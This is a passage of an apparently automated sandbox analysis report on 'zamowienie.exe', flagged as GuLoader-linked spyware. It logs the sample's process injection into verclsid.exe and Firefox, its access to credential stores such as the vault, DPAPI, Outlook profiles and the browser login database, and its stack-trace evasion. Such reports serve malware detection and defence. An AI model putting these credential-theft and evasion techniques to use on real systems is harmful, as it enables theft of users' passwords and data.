    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F39C327_2_04F39C32
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EDFDC07_2_04EDFDC0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F77D737_2_04F77D73
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC3D407_2_04EC3D40
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F71D5A7_2_04F71D5A
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC9EB07_2_04EC9EB0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04E83FD27_2_04E83FD2
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04E83FD57_2_04E83FD5
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7FFB17_2_04F7FFB1
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC1F927_2_04EC1F92
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7FF097_2_04F7FF09
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC38E07_2_04EC38E0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F2D8007_2_04F2D800
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC99507_2_04EC9950
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EDB9507_2_04EDB950
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F559107_2_04F55910
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F6DAC67_2_04F6DAC6
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F05AA07_2_04F05AA0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F61AA37_2_04F61AA3
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F5DAAC7_2_04F5DAAC
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F33A6C7_2_04F33A6C
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F77A467_2_04F77A46
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7FA497_2_04F7FA49
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F35BF07_2_04F35BF0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EFDBF97_2_04EFDBF9
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EDFB807_2_04EDFB80
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7FB767_2_04F7FB76
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EB1BC07_2_02EB1BC0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EACAC07_2_02EACAC0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EAAEA47_2_02EAAEA4
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EACCE07_2_02EACCE0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EAAD607_2_02EAAD60
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EB52207_2_02EB5220
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EA11227_2_02EA1122
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EB34607_2_02EB3460
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02ECB8C07_2_02ECB8C0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAE65C7_2_04DAE65C
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAE7EF7_2_04DAE7EF
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAD7287_2_04DAD728
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAE1A57_2_04DAE1A5
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAE2C37_2_04DAE2C3
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: String function: 04F2EA12 appears 86 times
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: String function: 04F07E54 appears 111 times
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: String function: 04EAB970 appears 280 times
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: String function: 04F3F290 appears 105 times
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: String function: 04EF5130 appears 58 times
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: String function: 34F6EA12 appears 84 times
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: String function: 34F35130 appears 58 times
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: String function: 34F47E54 appears 111 times
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: String function: 34F7F290 appears 105 times
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: String function: 34EEB970 appears 280 times
    Source: zamowienie.exeStatic PE information: invalid certificate
    Source: zamowienie.exe, 00000003.00000003.2844137125.0000000034E42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs zamowienie.exe
    Source: zamowienie.exe, 00000003.00000003.2842153780.0000000034C85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs zamowienie.exe
    Source: zamowienie.exe, 00000003.00000003.2902140294.0000000004DF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameverclsid.exej% vs zamowienie.exe
    Source: zamowienie.exe, 00000003.00000003.2902118172.0000000004E31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameverclsid.exej% vs zamowienie.exe
    Source: zamowienie.exe, 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs zamowienie.exe
    Source: zamowienie.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@7/15@8/7
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,LdrInitializeThunk,GetVersionExA,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004034F1
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_004048F0 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA,0_2_004048F0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_00402198 LdrInitializeThunk,LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,0_2_00402198
    Source: C:\Users\user\Desktop\zamowienie.exeFile created: C:\Users\user\AppData\Local\realmlessJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeFile created: C:\Users\user\AppData\Local\Temp\nsa2862.tmpJump to behavior
    Source: zamowienie.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\zamowienie.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: verclsid.exe, 00000007.00000003.3127092580.0000000003243000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3126986417.0000000003222000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3906236377.0000000003271000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3906236377.0000000003243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: C:\Users\user\Desktop\zamowienie.exeFile read: C:\Users\user\Desktop\zamowienie.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\zamowienie.exe "C:\Users\user\Desktop\zamowienie.exe"
    Source: C:\Users\user\Desktop\zamowienie.exeProcess created: C:\Users\user\Desktop\zamowienie.exe "C:\Users\user\Desktop\zamowienie.exe"
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeProcess created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
    Source: C:\Windows\SysWOW64\verclsid.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
    Source: C:\Users\user\Desktop\zamowienie.exeProcess created: C:\Users\user\Desktop\zamowienie.exe "C:\Users\user\Desktop\zamowienie.exe"Jump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeProcess created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: ieframe.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: mlang.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: winsqlite3.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: vaultcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: synderegistres.lnk.0.drLNK file: ..\..\Users\user\salrernes.Unl229
    Source: C:\Users\user\Desktop\zamowienie.exeFile written: C:\ProgramData\Microsoft\Windows\Start Menu\eksportafgrde.iniJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
    Source: zamowienie.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: zamowienie.exe, 00000003.00000001.2433379972.0000000000649000.00000020.00000001.01000000.00000007.sdmp
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dmQRVBQMPL.exe, 00000006.00000002.3906673030.0000000000D7E000.00000002.00000001.01000000.00000009.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3906681333.0000000000D7E000.00000002.00000001.01000000.00000009.sdmp
    Source: Binary string: wntdll.pdbUGP source: zamowienie.exe, 00000003.00000003.2844137125.0000000034D15000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842153780.0000000034B62000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.2949515842.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.2947332940.0000000004B26000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: zamowienie.exe, zamowienie.exe, 00000003.00000003.2844137125.0000000034D15000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842153780.0000000034B62000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, verclsid.exe, 00000007.00000003.2949515842.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.2947332940.0000000004B26000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: verclsid.pdbGCTL source: zamowienie.exe, 00000003.00000003.2902140294.0000000004DF6000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2902118172.0000000004E31000.00000004.00000020.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906341208.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: zamowienie.exe, 00000003.00000001.2433379972.0000000000649000.00000020.00000001.01000000.00000007.sdmp
    Source: Binary string: verclsid.pdb source: zamowienie.exe, 00000003.00000003.2902140294.0000000004DF6000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2902118172.0000000004E31000.00000004.00000020.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906341208.0000000000B88000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000000.00000002.2435885467.0000000005488000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_73401B28 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA,0_2_73401B28
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EC27FA pushad ; ret 3_2_34EC27F9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EC225F pushad ; ret 3_2_34EC27F9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EC283D push eax; iretd 3_2_34EC2858
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF09AD push ecx; mov dword ptr [esp], ecx3_2_34EF09B6
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04E827FA pushad ; ret 7_2_04E827F9
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04E8225F pushad ; ret 7_2_04E827F9
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04E8283D push eax; iretd 7_2_04E82858
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EB09AD push ecx; mov dword ptr [esp], ecx7_2_04EB09B6
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EB0B37 push ds; iretd 7_2_02EB0B40
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EB4FF9 push 00000065h; retf 7_2_02EB500E
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EBEC80 push edx; retn 134Bh7_2_02EBED83
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EB7306 pushad ; ret 7_2_02EB7304
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EB74CD push esp; retf 7_2_02EB74D1
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EBBFC7 push eax; iretd 7_2_02EBBFCC
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DA5491 push ds; retf 7_2_04DA549F
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DA659E push 00000051h; iretd 7_2_04DA65B2
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DA5564 push eax; retf 7_2_04DA5566
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAC6E5 push ecx; iretd 7_2_04DAC6AD
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAC67D push ecx; iretd 7_2_04DAC6AD
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAC60A push ecx; iretd 7_2_04DAC6AD
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DA47B3 push edi; ret 7_2_04DA47BA
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAD02C push FFFFFFF7h; ret 7_2_04DAD02F
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAB2A4 pushfd ; ret 7_2_04DAB305
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DA6258 push esp; ret 7_2_04DA6259
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DA737C pushfd ; iretd 7_2_04DA73BC
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DABD56 pushfd ; retf 7_2_04DABD57
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DA5E46 push ebp; ret 7_2_04DA5E61
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DA5E2D push ecx; retf 7_2_04DA5E39
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAC869 push edi; iretd 7_2_04DAC86A
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAC813 pushfd ; ret 7_2_04DAC814
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DA596F push 0000002Ch; ret 7_2_04DA5978
    Source: C:\Users\user\Desktop\zamowienie.exeFile created: C:\Users\user\AppData\Local\Temp\nsz31BB.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\zamowienie.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\eksportafgrde.iniJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Switches to a custom stack to bypass stack traces
    Source: C:\Users\user\Desktop\zamowienie.exeAPI/Special instruction interceptor: Address: 5A73A5F
    Source: C:\Users\user\Desktop\zamowienie.exeAPI/Special instruction interceptor: Address: 3C33A5F
    Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
    Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
    Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
    Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
    Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
    Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
